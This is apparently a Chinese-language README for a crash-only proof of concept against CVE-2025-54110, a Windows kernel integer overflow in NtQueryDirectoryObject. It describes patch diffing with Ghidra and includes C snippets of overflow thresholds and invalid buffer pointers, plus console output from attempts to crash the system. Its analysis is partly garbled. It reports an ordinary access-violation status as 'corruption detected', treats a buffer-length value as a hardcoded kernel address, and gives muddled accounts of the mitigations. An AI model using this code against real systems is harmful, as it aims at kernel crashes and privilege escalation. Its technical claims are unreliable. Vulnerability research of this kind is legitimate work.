CVE-2025-54110 利用代码实现——Windows NtQueryDirectoryObject 系统调用中的内核级整数溢出漏洞。
CVE: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54110
本仓库包含针对 CVE-2025-54110 内核权限提升漏洞的仅崩溃 PoC,专为安全研究、逆向工程和利用开发研究而开发。该代码旨在演示漏洞研究技术,包括:
此 PoC 不会实现权限提升或可靠的蓝屏死机 (BSOD)。它设计用于安全触发访问违例,这些违例会被 Windows 内核保护机制捕获。
发布日期: 2025 年 9 月(Windows 星期二安全补丁)
| 属性 | 值 |
|---|---|
| CWE | CWE-190:整数溢出或回绕 |
| CVSS 3.1 评分 | 8.8(高)/ 7.7(临时) |
| 向量字符串 | CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O/RC:C |
| 攻击向量 | 本地 |
| 攻击复杂度 | 低 |
| 所需权限 | 低 |
| 用户交互 | 无 |
| 影响范围 | 已变更 |
| 机密性影响 | 高 |
| 完整性影响 | 高 |
| 可用性影响 | 高 |
| 利用成熟度 | 未经验证 |
Windows 内核中的一个整数溢出漏洞允许经过身份验证的攻击者在本地提升权限。根据微软的安全公告:
"攻击者可以通过从沙盒用户模式进程发送特制的输入来利用此漏洞,触发整数溢出,导致内核中的缓冲区溢出,从而实现权限提升或沙盒逃逸。"
Windows Update Files from Aug 2025 & Sep 2025 (KB.msu) ↓ Extract CAB Files ↓ Calculate SHA-256 Hashes (August vs September) ↓ Identify Changed Files ↓ Ghidra Version Tracking Analysis ↓ Setting Symbol Servers to Clarify Function Names ↓ Function-Level Diff Comparison
### 2. 已分析的文件
初步分析聚焦于两个主要的内核组件:
#### win32k.sys (-)
- **结果:** 未检测到显著变化
- **评分范围:** 0.97-1.0(高相似度)
- **结论:** 不是 CVE-2025-54110 的易受攻击组件
#### ntoskrnl.exe (+)
- **结果:** 多个函数发生了显著变化
- **评分范围:** 函数评分 ≤0.951
- **长度差异:** 检测到源与目标字节长度变化
- **导出的总项数:** 2,036 个函数用于分析
### 3. Ghidra 版本跟踪结果
在 `ntoskrnl.exe` 中识别出的变化示例:
| 评分 | 置信度 | 源长度 | 目标长度 | 源函数 | 目标函数 |
|-------|------------|---------------|-------------|-----------------|---------------|
| 0.951 | 2.618 | 1023 | 365 | FUN_1403146d0 | FUN_1403a4ea0 |
| 0.950 | 2.285 | 113 | 203 | FUN_140680810 | FUN_1406d952c |
| 0.950 | 3.137 | 782 | 1050 | FUN_14032106c | FUN_140303a38 |
| 0.951 | 2.675 | 141 | 171 | FUN_140407bd0 | FUN_140a172a0 |
| 0.951 | 2.660 | 346 | 150 | FUN_140610e60 | FUN_1406115d4 |
---
## PoC 声明
### 技术方法
该 PoC(`precise_overflow_bsod.c`)试图通过以下方式触发整数溢出漏洞:
1. **精确阈值计算:** `0xfffffdbc`(源自 base=0x20, name=0x200)
2. **NtQueryDirectoryObject API:** 用于触发溢出的目标函数
3. **多阶段攻击策略:**
- 阶段 1:精确整数溢出尝试
- 阶段 2:内核内存定位
- 阶段 3:多线程利用
### 代码结构```c
// Key threshold values calculated for overflow
ULONG precise_thresholds[] = {
0xfffffdbc, // Precise threshold - base=0x20, name=0x200
0xfffffdbb, // Threshold - 1
0xfffffdbd, // Threshold + 1
0xfffffdba, // Threshold - 2
0xfffffdbe, // Threshold + 2
};
// Buffer configurations to test edge cases
PVOID buffer_types[] = {
VirtualAlloc(NULL, 0x1000, MEM_COMMIT, PAGE_READWRITE), // Normal buffer
VirtualAlloc(NULL, 0x10, MEM_COMMIT, PAGE_READWRITE), // Small buffer
NULL, // NULL pointer
(PVOID)0x4141414141414141, // Invalid pointer
(PVOID)0x0000000000000000, // Zero address
};
NtQueryDirectoryObject() Parameters: ├── DirectoryHandle: \BaseNamedObjects, \KernelObjects, etc. ├── Buffer: Various pointer configurations ├── BufferLength: Calculated overflow thresholds (0xfffffdbc variants) ├── ReturnSingleEntry: TRUE/FALSE variations ├── RestartScan: TRUE/FALSE variations └── Context: Controlled iteration state
---
## 为什么该PoC不会导致系统崩溃
### 实际结果
该PoC一致返回 `STATUS_ACCESS_VIOLATION (0xC0000005)`,而不会导致蓝屏死机(BSOD)。这是**设计使然**,并展示了多个关键的Windows内核安全机制:
### 1. 结构化异常处理(SEH)```
User-Mode Input → NtQueryDirectoryObject
↓
ProbeForRead/Write
↓
__try { ... }
↓
Access Violation Detected
↓
__except { ... }
↓
Return STATUS_ACCESS_VIOLATION
工作原理:
现代CPU功能,防止内核模式(Ring 0)在未经明确授权的情况下访问用户模式(Ring 3)内存:``` Kernel attempts to access user pointer ↓ SMAP checks permission (STAC/CLAC instructions) ↓ Unauthorized access detected ↓ CPU generates #PF (Page Fault) ↓ Caught by kernel exception handler
**Impact on PoC:**
- 即使发生溢出,内核到用户内存的直接访问也会被阻止
- 防止利用指针解引用漏洞
### 3. KASLR(内核地址空间布局随机化)```
Boot Time: Kernel Base = Random Address
↓
Hardcoded PoC address (0xfffffdbc)
↓
Does NOT match actual kernel structures
↓
Write to non-critical memory OR caught by SEH
为什么BSOD不会发生:
Windows 10+ 实现了增强的池损坏检测:``` Heap/Pool Allocation ↓ Header Contains: ├── Magic Values ├── Size Information └── Checksums ↓ On Free/Access: Validate Integrity ↓ Corruption Detected? ↓ [YES] → Safe Exception → Return Error [NO] → Proceed Normally
---
## 概念验证执行输出分析
### 预期输出
看到 `STATUS_ACCESS_VIOLATION (0xC0000005)`,然后就是正常的。```
C:\Users\reLab\Desktop\cve>.\poc64.exe
==================================================
CVE-2025-54110 - Kernel Integer Overflow PoC
==================================================
[!] WARNING: This code may crash the system (BSOD).
[?] Do you want to continue? (y/n): y
[>] Targeting directory: \BaseNamedObjects
[*] Attempting precision integer overflow...
[+] Corruption detected with threshold: 0xFFFFFDBC (Status: 0xC0000005)
[+] Corruption detected with threshold: 0xFFFFFDBB (Status: 0xC0000005)
[+] Corruption detected with threshold: 0xFFFFFDBD (Status: 0xC0000005)
[!] Vulnerability triggered. Attempting to crash system via race condition...
[>] Targeting directory: \KernelObjects
[*] Attempting precision integer overflow...
[+] Corruption detected with threshold: 0xFFFFFDBC (Status: 0xC0000005)
[+] Corruption detected with threshold: 0xFFFFFDBB (Status: 0xC0000005)
[+] Corruption detected with threshold: 0xFFFFFDBD (Status: 0xC0000005)
[!] Vulnerability triggered. Attempting to crash system via race condition...
[>] Targeting directory: \Sessions
[*] Attempting precision integer overflow...
[+] Corruption detected with threshold: 0xFFFFFDBC (Status: 0xC0000005)
[+] Corruption detected with threshold: 0xFFFFFDBB (Status: 0xC0000005)
[+] Corruption detected with threshold: 0xFFFFFDBD (Status: 0xC0000005)
[!] Vulnerability triggered. Attempting to crash system via race condition...
[>] Targeting directory: \Windows
[*] Attempting precision integer overflow...
[+] Corruption detected with threshold: 0xFFFFFDBC (Status: 0xC0000005)
[+] Corruption detected with threshold: 0xFFFFFDBB (Status: 0xC0000005)
[+] Corruption detected with threshold: 0xFFFFFDBD (Status: 0xC0000005)
[!] Vulnerability triggered. Attempting to crash system via race condition...
[-] Exploit finished. If the system is still running, the attack may have been mitigated.
C:\Users\reLab\Desktop\cve>
[+] Current user: desktop-lfkkhu2\relab [+] Current PID: 1444
[!] THIS EXPLOIT HAS HIGH CHANCE OF CAUSING BSOD! [!] Continue? (y/n): y [+] NT functions initialized successfully [+] Using precise threshold: 0xfffffdbc